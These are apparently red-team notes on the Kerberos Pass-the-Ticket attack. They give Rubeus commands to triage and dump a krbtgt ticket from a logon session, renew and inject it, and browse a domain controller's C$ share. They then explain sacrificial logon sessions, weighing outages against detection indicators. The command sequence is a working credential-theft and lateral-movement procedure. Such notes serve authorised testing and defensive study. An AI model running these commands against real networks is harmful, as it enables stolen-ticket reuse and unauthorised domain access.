Pass the Ticket

PTT: Check in house ticketS:

.\Rubeus.exe triage

Our current LUID (Logon UID) is 0x892730, but no tickets are associated with our session. We can use klist to make sure of this.

Reviewing Ticket Associated with our Session

klist

Extracting the ticket with Rubeus

.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

Renew

Rubeus.exe renew /ticket: /ptt

dir \\dc01\\c$

Sacrificial Processes This is the most crucial concept to understand regarding Kerberos Attacks, as failure to create a Sacrificial Process can result in taking a service down. This is because it is very easy to overwrite an existing Logon Sessions Kerberos Ticket. If the local machine account (SYSTEM$) loses its Kerberos ticket, it will likely not get another one until a reboot. If a service loses its ticket, it won't get a new one until the service restarts or sometimes a machine reboot.

A sacrificial process creates a new Logon Session and passes tickets to that session. This does require administrative rights to the machine and will create additional IOCs (Indicators of Compromise) that could be alerted upon. However, causing an outage during an engagement is much worse than getting caught due to safely doing things.